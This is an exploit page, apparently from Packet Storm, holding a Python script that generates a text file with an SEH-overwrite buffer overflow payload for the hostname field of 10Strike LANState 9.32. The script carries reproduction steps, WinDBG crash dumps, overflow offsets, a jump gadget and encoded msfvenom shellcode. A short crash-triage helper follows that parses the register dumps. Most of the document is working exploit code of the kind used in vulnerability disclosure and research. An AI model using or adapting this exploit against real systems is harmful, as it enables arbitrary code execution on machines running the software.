10Strike LANState 9.32 Host Check hostname Buffer Overflow - Packet Storm


#!/usr/bin/python

# Exploit Title: 10Strike LANState - Host Check hostname Buffer Overflow (SEH)
# Version: v9.32 x86
# Software Link: https://www.10-strike.com/lanstate/lanstate-setup.exe
# Date: 2020-04-01
# Exploit Author: Hodorsec (hodor@hodorsec.com / hodorsec@protonmail.com)
# Vendor Homepage: https://www.freecommander.com
# Tested on: Win7 x86 SP1 - Build 7601

# Description:
# - Exploits the "Force Check" option when listing the Host Checks in option "Check List". Entering an overly long string results in a crash which overwrites SEH.

# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SPs.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open LANState, use any "Map", for example the "demo_map"
# - Click on tab "Home", click option "Check List"
# - Right-click on any existing hostname and click "Edit"
# - Paste the value from clipboard in the field "Host address (name)"
# - Next, Next, Finish
# - In the "List of checks" overview, select the modified host and press the spacebar (Force Check)
# - Check results

# WinDBG initial crash output using only A's:
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
# eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\10-Strike LANState\LANState.exe
# LANState+0x2e57:
# 00402e57 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
# eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
# LANState+0x53e6:
# 004053e6 8b4af8 mov ecx,dword ptr [edx-8] ds:0023:41414139=????????
# 0:000> g
# (c5c.c2c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
# eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
# 41414141 ?? ???

import sys
import struct

# Filename
filename = "10_strike_lanstate-poc.txt"

# Maximum length
maxlen = 10000

# Shellcode, using alphanum chars due to bytes above \x7f being considered bad
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -v shellcode
# Payload size: 447 bytes
shellcode = (
    "\xdb\xdc\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
    "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
    "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
    "\x4c\x78\x68\x6d\x52\x65\x50\x37\x70\x77\x70\x43\x50\x4d\x59"
    "\x39\x75\x36\x51\x59\x50\x32\x44\x6e\x6b\x32\x70\x46\x50\x6e"
    "\x6b\x70\x52\x34\x4c\x6e\x6b\x61\x42\x45\x44\x4c\x4b\x54\x32"
    "\x47\x58\x36\x6f\x6e\x57\x53\x7a\x66\x46\x46\x51\x79\x6f\x4e"
    "\x4c\x37\x4c\x51\x71\x53\x4c\x44\x42\x44\x6c\x61\x30\x4a\x61"
    "\x68\x4f\x66\x6d\x73\x31\x49\x57\x59\x72\x58\x72\x30\x52\x56"
    "\x37\x4e\x6b\x52\x72\x34\x50\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b"
    "\x42\x6c\x57\x61\x74\x38\x6d\x33\x33\x78\x77\x71\x4b\x61\x32"
    "\x71\x6e\x6b\x51\x49\x77\x50\x76\x61\x6a\x73\x6e\x6b\x61\x59"
    "\x67\x68\x79\x73\x57\x4a\x42\x69\x4e\x6b\x37\x44\x6c\x4b\x43"
    "\x31\x4e\x36\x45\x61\x6b\x4f\x6c\x6c\x6a\x61\x48\x4f\x34\x4d"
    "\x47\x71\x5a\x67\x37\x48\x39\x70\x62\x55\x4b\x46\x65\x53\x63"
    "\x4d\x39\x68\x67\x4b\x73\x4d\x46\x44\x53\x45\x79\x74\x76\x38"
    "\x4c\x4b\x63\x68\x66\x44\x43\x31\x48\x53\x72\x46\x4e\x6b\x76"
    "\x6c\x70\x4b\x4e\x6b\x61\x48\x57\x6c\x46\x61\x79\x43\x6c\x4b"
    "\x54\x44\x6e\x6b\x57\x71\x68\x50\x6e\x69\x30\x44\x76\x44\x45"
    "\x74\x53\x6b\x61\x4b\x65\x31\x62\x79\x31\x4a\x30\x51\x39\x6f"
    "\x59\x70\x63\x6f\x71\x4f\x50\x5a\x6c\x4b\x56\x72\x4a\x4b\x6c"
    "\x4d\x73\x6d\x30\x6a\x77\x71\x6e\x6d\x4d\x55\x4e\x52\x37\x70"
    "\x75\x50\x63\x30\x52\x70\x63\x58\x56\x51\x4e\x6b\x42\x4f\x4e"
    "\x67\x69\x6f\x49\x45\x4d\x6b\x58\x70\x4d\x65\x6d\x72\x50\x56"
    "\x75\x38\x6e\x46\x6f\x65\x6f\x4d\x6d\x4d\x39\x6f\x58\x55\x75"
    "\x6c\x63\x36\x73\x4c\x76\x6a\x6b\x30\x59\x6b\x4d\x30\x52\x55"
    "\x74\x45\x6f\x4b\x43\x77\x42\x33\x63\x42\x62\x4f\x51\x7a\x77"
    "\x70\x73\x63\x69\x6f\x58\x55\x72\x43\x30\x61\x72\x4c\x31\x73"
    "\x46\x4e\x45\x35\x63\x48\x63\x55\x47\x70\x41\x41"
)

# Offsets (bytes from the start of the hostname field)
crash_ebp = 228
crash_nseh = 236
crash_seh = crash_nseh + 4

# Variables
nops = "\x90" * 16  # NOP sled

# Prefix
prefix = "A" * crash_nseh  # Filler up to the nSEH record
nseh = "\x71\x06\x70\x04"  # jno +6 / jo +4: short jump over nSEH/SEH
seh = struct.pack("<L", 0x0132730f)  # call dword ptr ss:[ebp-04] in LANState.exe
suffix = nops  # Old-school NOP'ing
suffix += shellcode  # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))  # Pad to maxlen

# Concatenate string for payload
payload = prefix + nseh + seh + suffix  # Put it all together

try:
    with open(filename, "wb") as f:
        f.write(payload)
    print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except IOError as e:
    print "[!] Error creating file: " + str(e)
    sys.exit(1)
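
An added crash-triage helper, not part of the original PoC: it parses the three WinDBG register dumps quoted in the header above (embedded here as constructed sample input, trimmed to the register lines) and reports, per fault, which registers are entirely overwritten by the 'A' filler byte. This is the check that tells a triager why the third fault, with eip=41414141, is the one that turns a crash into an SEH-overwrite finding; the regex and verdict labels are this example's own assumptions.

```python
import re

# Constructed sample: register lines from the WinDBG output quoted in the PoC header.
WINDBG_OUTPUT = """\
eax=00002759 ebx=0012f838 ecx=000007f6 edx=0012f880 esi=0781bf78 edi=00130000
eip=00402e57 esp=0012f7d8 ebp=0012f99c iopl=0 nv up ei pl nz na po nc
0:000> g
eax=0012f98c ebx=0012f98c ecx=05250858 edx=41414141 esi=00000002 edi=0012f7f0
eip=004053e6 esp=0012f7f8 ebp=0012f99c iopl=0 nv up ei pl nz na pe nc
0:000> g
eax=00000000 ebx=00000000 ecx=41414141 edx=77f0720d esi=00000000 edi=00000000
eip=41414141 esp=0012f298 ebp=0012f2b8 iopl=0 nv up ei pl zr na pe nc
"""

# Matches "reg=8hexdigits" for the general-purpose and control registers only.
REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|eip|esp|ebp)=([0-9a-f]{8})\b")

def parse_register_dumps(text):
    """Split WinDBG output at each 'g' continuation; return one {reg: value} dict per fault."""
    dumps = []
    for chunk in re.split(r"^0:000> g$", text, flags=re.M):
        regs = {name: int(val, 16) for name, val in REG_RE.findall(chunk)}
        if regs:
            dumps.append(regs)
    return dumps

def controlled_registers(regs, marker=0x41):
    """Registers whose all four bytes equal the filler byte (0x41 = 'A' in the PoC)."""
    pattern = int.from_bytes(bytes([marker]) * 4, "little")
    return sorted(r for r, v in regs.items() if v == pattern)

def triage(text):
    """Classify each fault: EIP control is the strongest signal, then a tainted pointer."""
    report = []
    for i, regs in enumerate(parse_register_dumps(text), 1):
        ctl = controlled_registers(regs)
        if "eip" in ctl:
            verdict = "eip-controlled"    # handler address taken from the overwritten SEH record
        elif ctl:
            verdict = "tainted-register"  # overwritten data reached a register used as a pointer
        else:
            verdict = "uncontrolled"      # first fault: the copy simply ran off the buffer
        report.append((i, verdict, ctl))
    return report

if __name__ == "__main__":
    for num, verdict, ctl in triage(WINDBG_OUTPUT):
        print("crash %d: %s %s" % (num, verdict, ctl))
```

The second fault (edx=41414141 dereferenced as a pointer) already shows attacker data in use, but only the third, where the exception dispatcher loads the overwritten handler address, demonstrates control of execution.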
